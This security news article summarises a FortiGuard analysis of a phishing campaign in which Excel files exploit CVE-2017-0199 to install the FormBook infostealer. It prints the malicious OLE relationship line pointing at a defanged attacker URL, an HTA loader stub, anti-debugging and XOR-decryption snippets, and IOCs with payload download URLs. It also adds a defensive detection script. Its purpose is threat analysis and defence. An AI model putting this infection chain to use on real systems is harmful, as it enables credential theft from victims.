Sunday, January 18, 2026

Weaponized Excel Files Deliver FormBook Malware to Windows Systems

Cybersecurity researchers at FortiGuard Labs have identified an active, high-severity phishing campaign targeting users of older Microsoft Office versions.

The attackers’ primary vehicle: malicious Excel attachments sent via email, specifically designed to exploit the long-known vulnerability CVE-2017-0199.

This campaign aims to deliver FormBook, an advanced information-stealing malware capable of capturing login credentials, keystrokes, and clipboard data.

The phishing emails are crafted to look like sales orders or other business documents, tricking recipients into opening the attached Excel file.

Example of the Phishing Email

Once opened on a vulnerable system, the weaponized Excel document leverages Office’s OLE (Object Linking and Embedding) functionality to retrieve a malicious HTA (HTML Application) file from a remote server via HTTP.

How the Exploit Works

Step-by-Step Exploitation:

  1. Phishing Email Delivery:
    The campaign begins with an email containing an Excel attachment. The subject line may be flagged as suspicious by some email security solutions, but many may not catch it if the attachment is not already known as malicious.
    • Example Subject: URGENT: Sales Order 12345 [virus detected]
  2. Exploiting CVE-2017-0199:
    Upon opening the Excel file in a vulnerable Office version (2007, 2010, 2013, or 2016), the document uses OLE to send an HTTP request to a remote server, fetching an HTA file. The external OLE relationship inside the document looks like this:

    ```xml
    <Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2006/relationships/oleObject" Target="hxxps[:]//agr[.]my/P6bJNr" TargetMode="External"/>
    ```
    • Result: The Office application requests the HTA file from the attacker’s server.
    • Process: When the file is retrieved, the Microsoft HTA application (mshta.exe) is launched to execute the malicious script.
  3. HTA File Execution:
    The downloaded HTA file contains base64-encoded content:

    ```text
    <script language="VBScript"> Execute DecodeBase64("...") </script>
    ```

    Upon execution, the script decodes the payload and typically downloads a secondary payload to the %APPDATA% directory.
  4. sihost.exe Payload:
    The HTA script downloads and executes a file named sihost.exe. Analysis of this executable reveals it was likely compiled with AutoIt, as evidenced by the magic number in its .rsrc section:

    ```text
    Magic Number: A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D
    ```

    This signature is characteristic of executables generated by Aut2Exe from AutoIt scripts. The sample also employs anti-debugging techniques, such as checking for an attached debugger with the IsDebuggerPresent API:

    ```autoit
    ; Ask kernel32 whether a user-mode debugger is attached to this process
    $IsDebug = DllCall("kernel32.dll", "int", "IsDebuggerPresent")
    ; DllCall returns an array; element 0 holds the function's return value
    If $IsDebug[0] Then MsgBox(0, "Debugger", "This is a third-party compiled AutoIt script.")
    ```
  5. Extracting and Decoding springmaker:
    The script within sihost.exe reads and decrypts a resource named SCRIPT from its .rsrc section. A file called springmaker is extracted to the %TEMP% directory. The decryption is performed using an XOR operation with the key 3NQXSHDTVT2DPK06:

    ```python
    # Example Python XOR decryption of the extracted springmaker resource
    data = open("springmaker", "rb").read()
    key = "3NQXSHDTVT2DPK06".encode()
    # Repeating-key XOR: byte i is XORed with key[i mod len(key)]
    decrypted = bytes([(c ^ key[i % len(key)]) for i, c in enumerate(data)])
    open("springmaker.decrypted", "wb").write(decrypted)
    ```
  6. FormBook Deployment:
    The decrypted springmaker file is the core payload, identified as the FormBook malware. Once executed, FormBook establishes persistence, exfiltrates sensitive data, and can receive further commands from its operators.
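As an added defensive check (written for this article, not code from the FortiGuard report), the following Python scans every relationship part of an OOXML workbook for the external oleObject relationship pattern shown in step 2, which is how a CVE-2017-0199 lure points Office at a remote HTA. The sample .rels content, its placeholder URL and the in-memory workbook are all constructed here.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample: a minimal OOXML relationships part with one ordinary
# internal relationship and one external OLE object relationship of the kind
# used by CVE-2017-0199 lures. The URL is a placeholder, not a campaign IOC.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2006/relationships/oleObject" Target="http://example.invalid/lure.hta" TargetMode="External"/>
</Relationships>"""

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE = "http://schemas.microsoft.com/office/2006/relationships/oleObject"


def find_external_ole(rels_xml) -> list[dict]:
    """Return every oleObject relationship whose target lies outside the package."""
    hits = []
    for rel in ET.fromstring(rels_xml).iter(f"{RELS_NS}Relationship"):
        if rel.get("Type") == OLE_TYPE and rel.get("TargetMode") == "External":
            hits.append({"id": rel.get("Id"), "target": rel.get("Target")})
    return hits


def scan_ooxml(blob: bytes) -> list[dict]:
    """Walk all *.rels parts of an OOXML zip and collect external OLE targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                for hit in find_external_ole(zf.read(name)):
                    findings.append({"part": name, **hit})
    return findings


def build_sample_xlsx() -> bytes:
    """Construct an in-memory zip mimicking a workbook that carries the lure relationship."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", SAMPLE_RELS)
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_ooxml(build_sample_xlsx()):
        print(f"external OLE object in {f['part']}: {f['id']} -> {f['target']}")
```

Any hit is worth quarantining for analysis: a legitimate workbook rarely needs an OLE object fetched over HTTP at open time.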

Implications and Protection Measures

This attack chain highlights the continued threat posed by outdated software and the sophistication of modern malware campaigns. Despite the availability of patches for CVE-2017-0199 since 2017, many organizations remain vulnerable due to patch management challenges.

Indicators of Compromise (IOCs)

  • URLs:
    • hxxp[:]//172[.]245[.]123[.]32/xampp/hh/wef[.]hta
    • hxxp[:]//172[.]245[.]123[.]32/199/sihost[.]exe
  • Samples (SHA-256):
    • AprilSAO2025.xls: 33A1696D69874AD86501F739A0186F0E4C0301B5A45D73DA903F91539C0DB427
    • wef.hta: 2BFBF6792CA46219259424EFBBBEE09DDBE6AE8FD9426C50AA0326A530AC5B14
    • siHOST.exe: 7E16ED31277C31C0370B391A1FC73F77D7F0CD13CC3BAB0EAA9E2F303B6019AF
    • springmaker (decrypted/FormBook): 3843F96588773E2E463A4DA492C875B3241A4842D0C087A19C948E2BE0898364

Defensive Recommendations

  • Update Software: Ensure all Microsoft Office installations are updated to the latest versions.
  • Email Security: Deploy advanced email filtering and sandboxing solutions to detect and block malicious attachments.
  • Endpoint Protection: Use antivirus and endpoint detection and response (EDR) tools capable of detecting FormBook and similar malware.
  • User Awareness: Train employees to recognize phishing attempts and the dangers of opening unexpected attachments.
  • Network Monitoring: Monitor for connections to known malicious IPs and domains.

The recent weaponized Excel campaign exploiting CVE-2017-0199 to deliver FormBook malware is a stark reminder of the risks posed by unpatched software and social engineering.

Organizations must remain vigilant, applying patches promptly and educating users to mitigate the risk of such sophisticated attacks.
